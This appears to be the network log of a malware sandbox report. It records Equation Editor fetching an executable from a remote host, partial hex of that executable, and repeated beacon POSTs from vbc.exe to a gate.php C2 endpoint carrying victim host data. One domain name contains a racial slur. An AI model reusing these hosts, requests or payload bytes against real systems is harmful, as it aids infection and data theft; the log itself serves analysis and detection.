Dec 21, 2020 08:34:27.087270975 CET	8.8.8.8	192.168.2.22	0xb38	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:27.544984102 CET	8.8.8.8	192.168.2.22	0xd747	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:28.019649982 CET	8.8.8.8	192.168.2.22	0x77b8	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:28.470670938 CET	8.8.8.8	192.168.2.22	0x617c	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:28.910393953 CET	8.8.8.8	192.168.2.22	0x202	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:29.363013029 CET	8.8.8.8	192.168.2.22	0x7c63	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:29.792376041 CET	8.8.8.8	192.168.2.22	0x5ee0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:30.488459110 CET	8.8.8.8	192.168.2.22	0xa6f6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:31.113116026 CET	8.8.8.8	192.168.2.22	0x1ba9	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:31.554856062 CET	8.8.8.8	192.168.2.22	0xe63e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:32.024882078 CET	8.8.8.8	192.168.2.22	0x888e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:32.765345097 CET	8.8.8.8	192.168.2.22	0x65dd	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:33.223654985 CET	8.8.8.8	192.168.2.22	0x64fa	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:33.679516077 CET	8.8.8.8	192.168.2.22	0x5a90	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:34.262284994 CET	8.8.8.8	192.168.2.22	0x4033	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:34.860109091 CET	8.8.8.8	192.168.2.22	0xfe2d	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:35.622085094 CET	8.8.8.8	192.168.2.22	0x4ad4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:36.322339058 CET	8.8.8.8	192.168.2.22	0xfcbf	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:36.769982100 CET	8.8.8.8	192.168.2.22	0xf28f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:37.208910942 CET	8.8.8.8	192.168.2.22	0x6d7e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:37.691914082 CET	8.8.8.8	192.168.2.22	0x2da4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:38.143122911 CET	8.8.8.8	192.168.2.22	0xf6c3	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:38.605318069 CET	8.8.8.8	192.168.2.22	0xf948	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:39.042166948 CET	8.8.8.8	192.168.2.22	0x5ed7	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:39.484519958 CET	8.8.8.8	192.168.2.22	0x19f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:39.949804068 CET	8.8.8.8	192.168.2.22	0x6bdc	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:40.411335945 CET	8.8.8.8	192.168.2.22	0xed92	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:40.897921085 CET	8.8.8.8	192.168.2.22	0x6d8f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:41.351249933 CET	8.8.8.8	192.168.2.22	0x4c89	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:41.811691046 CET	8.8.8.8	192.168.2.22	0x7dc6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:42.254544020 CET	8.8.8.8	192.168.2.22	0xc3b2	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:42.712438107 CET	8.8.8.8	192.168.2.22	0x84fe	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:43.150263071 CET	8.8.8.8	192.168.2.22	0x5b58	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:43.584795952 CET	8.8.8.8	192.168.2.22	0xb6a4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:44.036796093 CET	8.8.8.8	192.168.2.22	0x34bc	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:44.473915100 CET	8.8.8.8	192.168.2.22	0xc12d	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:44.954178095 CET	8.8.8.8	192.168.2.22	0x5ed5	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:45.429600954 CET	8.8.8.8	192.168.2.22	0x9a94	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:45.901180983 CET	8.8.8.8	192.168.2.22	0xd4e0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:46.319533110 CET	8.8.8.8	192.168.2.22	0x14b7	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:46.761755943 CET	8.8.8.8	192.168.2.22	0x5e2c	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:47.214833975 CET	8.8.8.8	192.168.2.22	0xe624	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:49.678874969 CET	8.8.8.8	192.168.2.22	0x4e4e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:50.124838114 CET	8.8.8.8	192.168.2.22	0xedc0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:50.580688000 CET	8.8.8.8	192.168.2.22	0xeb9	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:51.027374983 CET	8.8.8.8	192.168.2.22	0xbbeb	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:51.576589108 CET	8.8.8.8	192.168.2.22	0x5348	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:52.005129099 CET	8.8.8.8	192.168.2.22	0xfc79	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:53.261873960 CET	8.8.8.8	192.168.2.22	0x78a1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:53.698725939 CET	8.8.8.8	192.168.2.22	0x18c2	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:54.152901888 CET	8.8.8.8	192.168.2.22	0xb8aa	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:54.628766060 CET	8.8.8.8	192.168.2.22	0x65b7	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:55.097997904 CET	8.8.8.8	192.168.2.22	0x7104	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:55.557415962 CET	8.8.8.8	192.168.2.22	0x8aa4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:56.016134977 CET	8.8.8.8	192.168.2.22	0xd2ed	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:56.456948042 CET	8.8.8.8	192.168.2.22	0xa776	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:56.921036005 CET	8.8.8.8	192.168.2.22	0x747a	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:57.370323896 CET	8.8.8.8	192.168.2.22	0x1554	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:57.836646080 CET	8.8.8.8	192.168.2.22	0x980b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:58.287416935 CET	8.8.8.8	192.168.2.22	0xda8e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:58.736073017 CET	8.8.8.8	192.168.2.22	0xe33f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:59.182039022 CET	8.8.8.8	192.168.2.22	0xc079	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:59.643393993 CET	8.8.8.8	192.168.2.22	0x6088	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:00.095675945 CET	8.8.8.8	192.168.2.22	0x99bd	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:00.546318054 CET	8.8.8.8	192.168.2.22	0xf6c8	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:00.984199047 CET	8.8.8.8	192.168.2.22	0x49c8	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:01.415328979 CET	8.8.8.8	192.168.2.22	0x2265	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:01.873703957 CET	8.8.8.8	192.168.2.22	0xbb03	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:02.325675964 CET	8.8.8.8	192.168.2.22	0x59f4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:02.766237974 CET	8.8.8.8	192.168.2.22	0xaa23	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

chnesstdyqudusisabadassniggainthestfmv.ydns.eu

begadi.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	103.141.138.119	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:20.406845093 CET	1	OUT	GET /secure/svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: chnesstdyqudusisabadassniggainthestfmv.ydns.eu Connection: Keep-Alive
Dec 21, 2020 08:33:20.617223978 CET	2	IN	HTTP/1.1 200 OK Date: Mon, 21 Dec 2020 07:33:18 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 Last-Modified: Mon, 21 Dec 2020 04:54:47 GMT ETag: "8ec00-5b6f241edd261" Accept-Ranges: bytes Content-Length: 584704 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 56 b1 8b 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e2 08 00 00 08 00 00 00 00 00 00 1e 01 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 00 09 00 53 00 00 00 00 20 09 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 e1 08 00 00 20 00 00 00 e2 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 05 00 00 00 20 09 00 00 06 00 00 00 e4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 09 00 00 02 00 00 00 ea 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 09 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 d1 06 00 e8 2e 02 00 03 00 00 00 a9 03 00 06 10 56 02 00 d0 7b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f 5d ed 3a 11 eb fd b4 77 bd ed 48 ae 33 e8 90 08 9d 63 b4 61 62 66 1c e5 d7 11 c2 c4 13 13 13 98 c8 89 05 25 1d fd a8 c3 cf 13 08 9f 1f fd 3b 78 3b 78 de 20 40 c3 92 d3 ee 6f 1d 70 92 31 c5 d4 f8 cf ea 1e c7 98 d7 15 47 0b 65 b0 cf 57 d2 e4 40 2b 95 cd 06 51 78 f0 ed 22 8f 42 f4 59 d5 7c 5e bd e8 43 09 b2 95 33 26 04 19 53 b5 08 7e 96 f9 ab 83 aa b2 cb 87 91 e8 c9 2f bd 9d 13 aa 0c 9e 75 76 2f 40 8f f1 69 4d 4d cb 25 09 16 1f e8 f6 27 fc 82 93 f9 eb 09 bd 3d 31 ea 34 7a 94 11 7c c5 29 0d e8 51 5c 0e 4b 55 93 db 16 4d 07 41 7b d8 7c 05 e3 f3 3b b1 12 a4 35 31 c2 46 1b 6c 70 a9 f2 65 16 1c 6e 69 79 11 d3 80 e5 43 a0 a6 d0 11 55 31 5c 4d d4 52 69 86 cb fb 05 de 0a 28 0f dd 89 52 3f e2 88 d5 45 4e 1f 25 1b c2 f6 cf 76 7e 92 1b 6c 80 97 b1 86 95 1f b5 98 23 24 05 1e 14 29 4a 2e 42 3d f6 35 d3 71 ea a4 d0 c1 40 55 d2 47 ee fb f4 b9 10 65 2e aa 63 f1 7a 0b f3 80 fd 84 5a 75 93 19 f7 41 85 57 75 61 29 62 e7 b8 8c 31 c2 f4 e0 60 98 e5 3a 3c 5e 80 9c b2 41 5c 29 7b 97 a2 02 3b d2 d3 e8 2c 0a 06 b4 67 84 ee 32 e9 0a 2e c6 f7 8f e5 3f 70 7b 78 40 1c cb 01 44 27 9c 25 a9 82 65 60 24 78 9c ee ae a3 68 50 b2 13 97 fc 97 95 a6 17 38 4f 82 ef a6 a0 c8 56 5a 1c 15 a6 f7 a5 02 de e6 23 88 63 6b f4 70 2d c2 54 d7 d6 e5 56 60 9c 52 2d c4 74 ae 1f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELV0 @ `@S @ H.text$ `.rsrc @@.reloc@@BH.V{]:wH3cabf%;x;x @op1GeW@+Qx"BY\|^C3&S~/uv/@iMM%'=14z\|)Q\KUMA{\|;51FlpeniyCU1\MRi(R?EN%v~l#$)J.B=5q@UGe.czZuAWua)b1`:<^A\){;,g2.?p{x@D'%e`$xhP8OVZ#ckp-TV`R-t
Dec 21, 2020 08:33:20.617294073 CET	3	IN	Data Raw: 19 2b 64 74 40 05 74 6c e5 cf 97 82 f7 94 89 e8 53 70 b3 35 5f b5 1d f2 8f 9d 09 58 42 fa 7a d1 3b 2f 50 f7 26 c6 79 51 8d 78 f9 c1 43 b7 c1 14 b0 32 8f b4 85 17 93 a3 92 9c 4e 6e 0b 93 43 42 71 63 a3 6e a4 2b 91 1a 13 2a 06 39 b9 f2 dd 96 3b 82 Data Ascii: +dt@tlSp5_XBz;/P&yQxC2NnCBqcn+*9;$pFO/'5m%JMkNX\( C,CJtKVgr)hM%>K\|uFd7!AjYy+{H.-]k/0;+j[^Y"@'
Dec 21, 2020 08:33:20.617346048 CET	5	IN	Data Raw: 5a 40 75 b6 c6 c7 a8 58 57 cf e0 ed 61 b1 2d 4d 34 a8 19 31 de f2 8d 15 3b cc 1a 07 75 89 cf 46 95 f4 67 6b 88 32 b3 ab d5 f9 39 0d d5 80 62 aa 58 a1 09 e9 6b de 6e 76 f8 7e b4 87 1f 48 2b 89 5a 05 cc 71 89 d0 88 35 d3 50 7d eb bf 80 f0 e5 f3 5d Data Ascii: Z@uXWa-M41;uFgk29bXknv~H+Zq5P}]_"'11SBGdvt6T5,ql/8)y6!F'@HGREM%B@=lrc\+v10}hEky0bF$c>xfrLV-}v.^or*.
Dec 21, 2020 08:33:20.617459059 CET	6	IN	Data Raw: 5a 61 38 2b ff ff ff 07 2c 08 20 f1 f9 da a1 25 2b 06 20 9d 98 b2 87 25 26 08 20 4d d3 0b 2d 5a 61 38 0c ff ff ff 14 fe 06 07 00 00 06 73 15 00 00 0a 28 13 00 00 06 25 17 28 14 00 00 06 14 28 15 00 00 06 2a 00 00 00 13 30 03 00 0b 00 00 00 01 00 Data Ascii: Za8+, %+ %& M-Za8s(%((0(70Vu-g 3 a%^E$He68`rp( +ecZ yQa+(- c}n%+ T%&
Dec 21, 2020 08:33:20.824466944 CET	8	IN	Data Raw: 00 00 90 03 00 00 44 0f 00 00 0c 07 00 00 b8 02 00 00 df 0f 00 00 f2 04 00 00 44 0d 00 00 5d 05 00 00 88 06 00 00 7f 09 00 00 3b 02 00 00 bb 0d 00 00 91 01 00 00 09 05 00 00 72 0b 00 00 91 0f 00 00 aa 04 00 00 d7 0c 00 00 f1 0c 00 00 f4 09 00 00 Data Ascii: DD];r%~8X us8VRXG, N]%+ E'%&83, -Z k@a8 I, }Z [a8RXG, ]"%+ wc%&8(/
Dec 21, 2020 08:33:20.824496984 CET	9	IN	Data Raw: 38 93 f8 ff ff 08 11 20 e0 58 11 26 58 11 06 11 26 58 47 52 20 fc 5f 32 03 38 7a f8 ff ff 11 1a 1a 1f 40 12 00 28 08 00 00 06 26 20 82 c4 eb 2d 38 63 f8 ff ff 11 06 1f 0a 58 16 52 16 13 0e 11 2c 20 8a 1a fc 0a 5a 20 33 03 89 38 61 38 46 f8 ff ff Data Ascii: 8 X&X&XGR _28z@(& -8cXR, Z 38a8F(Y(X, xQ4Z `Da8#RX 4(:8*2 )$%+ v~f%&8RX 18)Y)X, v#+Z \a8XX, }Z fa8
Dec 21, 2020 08:33:20.824522972 CET	10	IN	Data Raw: 95 11 1e 36 08 20 49 a5 fe 6a 25 2b 06 20 97 5b d7 7f 25 26 38 45 f3 ff ff 11 27 17 58 13 27 11 2c 20 10 92 fc ce 5a 20 3b c0 55 8a 61 38 2c f3 ff ff 11 1c 17 58 13 1c 11 2c 20 46 bd e0 e6 5a 20 32 65 27 a7 61 38 13 f3 ff ff 11 2b 17 58 13 2b 11 Data Ascii: 6 Ij%+ [%&8E'X', Z ;Ua8,X, FZ 2e'a8+X+, Z =a8X .x8 ntdlTX l.dlTZXlS, dZ $a8 NtCoTX ntinTZX ueS, fZ oa8", 9OZ ura8sH@
Dec 21, 2020 08:33:20.824547052 CET	12	IN	Data Raw: 40 12 00 28 08 00 00 06 26 20 c5 f5 3e 4e 38 11 ee ff ff 11 2b 1e 2f 08 20 12 90 7b 53 25 2b 06 20 63 30 d6 2b 25 26 38 f8 ed ff ff 11 15 11 22 95 11 14 35 08 20 4d 60 ac 4e 25 2b 06 20 b9 8f 45 7c 25 26 38 db ed ff ff 08 11 19 e0 58 13 1a 11 1a Data Ascii: @(& >N8+/ {S%+ c0+%&8"5 M`N%+ E\|%&8X@(&, 2Z 1+a8RX !h.8, *RCZ }a8K, %Z r'Ia8u""X7 #%+ J4\|%&, Qz"3Za8I&X&, JRZ `Ta80
Dec 21, 2020 08:33:20.824577093 CET	13	IN	Data Raw: e5 02 00 00 4c 00 00 00 3b 03 00 00 95 03 00 00 38 d4 03 00 00 09 09 1f 19 62 61 0d 11 0c 20 0f 7f d7 ae 5a 20 17 ae 28 85 61 38 50 ff ff ff 11 04 1f 10 58 13 04 11 0c 20 d7 5f cf b9 5a 20 e0 33 bf 4e 61 38 36 ff ff ff 11 0c 20 c2 8e 2d f1 5a 20 Data Ascii: L;8ba Z (a8PX _Z 3Na86 -Z a8#a Nu&Z *%Ra8 dtZ a8%X 8(/ [PZ 2]@a8 )<Z G\|a82 g%+ '%&
Dec 21, 2020 08:33:20.824605942 CET	14	IN	Data Raw: 1b 0b 11 07 20 fd 30 a3 3e 5a 20 f0 12 c7 c8 61 38 c0 fe ff ff 11 07 20 89 44 0e 3a 5a 20 f8 67 6c e3 61 38 ad fe ff ff 12 01 fe 15 03 00 00 1b 02 20 ff ff ff 3f 5f 10 00 02 18 62 10 00 11 07 20 ee d5 ed 78 5a 20 6c dd b2 a2 61 38 84 fe ff ff 7e Data Ascii: 0>Z a8 D:Z gla8 ?_b xZ la8~%X~%Xb`~%Xb`~%Xb` O>Z aa85(,o;(< }Z a8 Z pa8~Y(
Dec 21, 2020 08:33:20.824649096 CET	16	IN	Data Raw: 00 04 02 25 17 58 10 00 91 1e 62 60 7e 02 00 00 04 02 25 17 58 10 00 91 1f 10 62 60 7e 02 00 00 04 02 25 17 58 10 00 91 1f 18 62 60 0c 28 38 00 00 0a 7e 02 00 00 04 02 08 6f 39 00 00 0a 28 3a 00 00 0a a5 03 00 00 1b 0b 11 07 20 db 32 6c 38 5a 20 Data Ascii: %Xb`~%Xb`~%Xb`(8~o9(: 2l8Z a8nj3 %r%+ XH%& Za8 Z xa8~%X~%Xb`~%Xb`~%Xb`~%X~%Xb`~%X

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:32.340296984 CET	616	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 176 Connection: close
Dec 21, 2020 08:33:32.400612116 CET	616	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus701188ALBUS-PCk0DE4229FCF97F5879F50F8FD3Dog1R
Dec 21, 2020 08:33:32.529612064 CET	617	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49177	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:36.908483028 CET	628	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:36.968420982 CET	629	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:37.104372025 CET	629	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.22	49267	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:23.377784014 CET	752	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:23.441164017 CET	752	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:23.570331097 CET	753	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.22	49268	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:23.832814932 CET	753	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:23.895550966 CET	754	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:24.179902077 CET	754	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.22	49269	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
